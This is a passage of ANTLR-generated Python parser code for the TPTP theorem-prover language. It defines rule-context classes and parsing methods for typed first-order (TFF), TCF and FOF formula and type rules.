self.enterOuterAlt(localctx, 1)
self.state = 967
self.untyped_atom()
self.state = 968
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 969
self.tff_top_level_type()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 971
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 972
self.tff_typed_atom()
self.state = 973
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_subtypeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def untyped_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Untyped_atomContext,0)
def Subtype_sign(self):
return self.getToken(tptp_v7_0_0_0Parser.Subtype_sign, 0)
def atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AtomContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_subtype
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_subtype" ):
listener.enterTff_subtype(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_subtype" ):
listener.exitTff_subtype(self)
def tff_subtype(self):
localctx = tptp_v7_0_0_0Parser.Tff_subtypeContext(self, self._ctx, self.state)
self.enterRule(localctx, 154, self.RULE_tff_subtype)
try:
self.enterOuterAlt(localctx, 1)
self.state = 977
self.untyped_atom()
self.state = 978
self.match(tptp_v7_0_0_0Parser.Subtype_sign)
self.state = 979
self.atom()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_top_level_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def tff_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_mapping_typeContext,0)
def tf1_quantified_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tf1_quantified_typeContext,0)
def tff_top_level_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_top_level_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_top_level_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_top_level_type" ):
listener.enterTff_top_level_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_top_level_type" ):
listener.exitTff_top_level_type(self)
def tff_top_level_type(self):
localctx = tptp_v7_0_0_0Parser.Tff_top_level_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 156, self.RULE_tff_top_level_type)
try:
self.state = 988
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,57,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 981
self.tff_atomic_type()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 982
self.tff_mapping_type()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 983
self.tf1_quantified_type()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 984
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 985
self.tff_top_level_type()
self.state = 986
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tf1_quantified_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def TyForall(self):
return self.getToken(tptp_v7_0_0_0Parser.TyForall, 0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def tff_monotype(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_monotypeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tf1_quantified_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTf1_quantified_type" ):
listener.enterTf1_quantified_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTf1_quantified_type" ):
listener.exitTf1_quantified_type(self)
def tf1_quantified_type(self):
localctx = tptp_v7_0_0_0Parser.Tf1_quantified_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 158, self.RULE_tf1_quantified_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 990
self.match(tptp_v7_0_0_0Parser.TyForall)
self.state = 991
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 992
self.tff_variable_list()
self.state = 993
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 994
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 995
self.tff_monotype()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
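    # tff_monotype ::= tff_atomic_type | '(' tff_mapping_type ')'  (two alternatives, selected on the lookahead token)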
class Tff_monotypeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def tff_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_mapping_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_monotype
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_monotype" ):
listener.enterTff_monotype(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_monotype" ):
listener.exitTff_monotype(self)
def tff_monotype(self):
localctx = tptp_v7_0_0_0Parser.Tff_monotypeContext(self, self._ctx, self.state)
self.enterRule(localctx, 160, self.RULE_tff_monotype)
try:
self.state = 1002
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 997
self.tff_atomic_type()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 998
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 999
self.tff_mapping_type()
self.state = 1000
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_unitary_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def tff_xprod_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_xprod_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_unitary_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_unitary_type" ):
listener.enterTff_unitary_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_unitary_type" ):
listener.exitTff_unitary_type(self)
def tff_unitary_type(self):
localctx = tptp_v7_0_0_0Parser.Tff_unitary_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 162, self.RULE_tff_unitary_type)
try:
self.state = 1009
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1004
self.tff_atomic_type()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 1005
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1006
self.tff_xprod_type(0)
self.state = 1007
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_atomic_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def type_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Type_constantContext,0)
def defined_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_typeContext,0)
def type_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Type_functorContext,0)
def tff_type_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_type_argumentsContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_atomic_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_atomic_type" ):
listener.enterTff_atomic_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_atomic_type" ):
listener.exitTff_atomic_type(self)
def tff_atomic_type(self):
localctx = tptp_v7_0_0_0Parser.Tff_atomic_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 164, self.RULE_tff_atomic_type)
try:
self.state = 1019
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,60,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1011
self.type_constant()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1012
self.defined_type()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1013
self.type_functor()
self.state = 1014
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1015
self.tff_type_arguments()
self.state = 1016
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 1018
self.variable()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_type_argumentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_atomic_type(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_atomic_typeContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_type_arguments
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_type_arguments" ):
listener.enterTff_type_arguments(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_type_arguments" ):
listener.exitTff_type_arguments(self)
def tff_type_arguments(self):
localctx = tptp_v7_0_0_0Parser.Tff_type_argumentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 166, self.RULE_tff_type_arguments)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1021
self.tff_atomic_type()
self.state = 1026
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1022
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1023
self.tff_atomic_type()
self.state = 1028
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_mapping_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_typeContext,0)
def Arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Arrow, 0)
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_mapping_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_mapping_type" ):
listener.enterTff_mapping_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_mapping_type" ):
listener.exitTff_mapping_type(self)
def tff_mapping_type(self):
localctx = tptp_v7_0_0_0Parser.Tff_mapping_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 168, self.RULE_tff_mapping_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1029
self.tff_unitary_type()
self.state = 1030
self.match(tptp_v7_0_0_0Parser.Arrow)
self.state = 1031
self.tff_atomic_type()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
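    # tff_xprod_type ::= tff_unitary_type '*' tff_atomic_type ('*' tff_atomic_type)*
    # This rule is left-recursive; the generated method uses enterRecursionRule/precpred
    # and pushNewRecursionContext to rebuild the left-recursive spine iteratively.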
class Tff_xprod_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_typeContext,0)
def Star(self):
return self.getToken(tptp_v7_0_0_0Parser.Star, 0)
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def tff_xprod_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_xprod_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_xprod_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_xprod_type" ):
listener.enterTff_xprod_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_xprod_type" ):
listener.exitTff_xprod_type(self)
def tff_xprod_type(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Tff_xprod_typeContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 170
self.enterRecursionRule(localctx, 170, self.RULE_tff_xprod_type, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1034
self.tff_unitary_type()
self.state = 1035
self.match(tptp_v7_0_0_0Parser.Star)
self.state = 1036
self.tff_atomic_type()
self._ctx.stop = self._input.LT(-1)
self.state = 1043
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,62,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Tff_xprod_typeContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_tff_xprod_type)
self.state = 1038
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 1039
self.match(tptp_v7_0_0_0Parser.Star)
self.state = 1040
self.tff_atomic_type()
self.state = 1045
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,62,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Tcf_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tcf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tcf_logic_formulaContext,0)
def tff_typed_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_typed_atomContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tcf_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTcf_formula" ):
listener.enterTcf_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTcf_formula" ):
listener.exitTcf_formula(self)
def tcf_formula(self):
localctx = tptp_v7_0_0_0Parser.Tcf_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 172, self.RULE_tcf_formula)
try:
self.state = 1048
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,63,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1046
self.tcf_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1047
self.tff_typed_atom()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tcf_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tcf_quantified_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tcf_quantified_formulaContext,0)
def cnf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tcf_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTcf_logic_formula" ):
listener.enterTcf_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTcf_logic_formula" ):
listener.exitTcf_logic_formula(self)
def tcf_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Tcf_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 174, self.RULE_tcf_logic_formula)
try:
self.state = 1052
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Forall]:
self.enterOuterAlt(localctx, 1)
self.state = 1050
self.tcf_quantified_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18, tptp_v7_0_0_0Parser.T__23, tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25, tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 1051
self.cnf_formula()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tcf_quantified_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Forall(self):
return self.getToken(tptp_v7_0_0_0Parser.Forall, 0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def cnf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tcf_quantified_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTcf_quantified_formula" ):
listener.enterTcf_quantified_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTcf_quantified_formula" ):
listener.exitTcf_quantified_formula(self)
def tcf_quantified_formula(self):
localctx = tptp_v7_0_0_0Parser.Tcf_quantified_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 176, self.RULE_tcf_quantified_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1054
self.match(tptp_v7_0_0_0Parser.Forall)
self.state = 1055
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1056
self.tff_variable_list()
self.state = 1057
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 1058
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 1059
self.cnf_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
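    # FOF (first-order form) rules start here: fof_formula ::= fof_logic_formula | fof_sequent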
class Fof_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_logic_formulaContext,0)
def fof_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_formula" ):
listener.enterFof_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_formula" ):
listener.exitFof_formula(self)
def fof_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 178, self.RULE_fof_formula)
try:
self.state = 1063
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,65,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1061
self.fof_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1062
self.fof_sequent()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_binary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_binary_formulaContext,0)
def fof_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_logic_formula" ):
listener.enterFof_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_logic_formula" ):
listener.exitFof_logic_formula(self)
def fof_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 180, self.RULE_fof_logic_formula)
try:
self.state = 1067
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,66,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1065
self.fof_binary_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1066
self.fof_unitary_formula()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_binary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_binary_nonassoc(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_binary_nonassocContext,0)
def fof_binary_assoc(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_binary_assocContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_binary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_binary_formula" ):
listener.enterFof_binary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_binary_formula" ):
listener.exitFof_binary_formula(self)
def fof_binary_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_binary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 182, self.RULE_fof_binary_formula)
try:
self.state = 1071
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,67,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1069
self.fof_binary_nonassoc()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1070
self.fof_binary_assoc()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_binary_nonassocContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,i)
def binary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Binary_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_binary_nonassoc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_binary_nonassoc" ):
listener.enterFof_binary_nonassoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_binary_nonassoc" ):
listener.exitFof_binary_nonassoc(self)
def fof_binary_nonassoc(self):
localctx = tptp_v7_0_0_0Parser.Fof_binary_nonassocContext(self, self._ctx, self.state)
self.enterRule(localctx, 184, self.RULE_fof_binary_nonassoc)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1073
self.fof_unitary_formula()
self.state = 1074
self.binary_connective()
self.state = 1075
self.fof_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_binary_assocContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_or_formulaContext,0)
def fof_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_binary_assoc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_binary_assoc" ):
listener.enterFof_binary_assoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_binary_assoc" ):
listener.exitFof_binary_assoc(self)
def fof_binary_assoc(self):
localctx = tptp_v7_0_0_0Parser.Fof_binary_assocContext(self, self._ctx, self.state)
self.enterRule(localctx, 186, self.RULE_fof_binary_assoc)
try:
self.state = 1079
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,68,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1077
self.fof_or_formula(0)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1078
self.fof_and_formula(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
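    # fof_or_formula and fof_and_formula are the associative binary cases; both are
    # left-recursive and follow the same recursion-context pattern as tff_xprod_type above.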
class Fof_or_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,i)
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def fof_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_or_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_or_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_or_formula" ):
listener.enterFof_or_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_or_formula" ):
listener.exitFof_or_formula(self)
def fof_or_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Fof_or_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 188
self.enterRecursionRule(localctx, 188, self.RULE_fof_or_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1082
self.fof_unitary_formula()
self.state = 1083
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 1084
self.fof_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 1091
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,69,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Fof_or_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_fof_or_formula)
self.state = 1086
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 1087
self.match(tptp_v7_0_0_0Parser.Or)
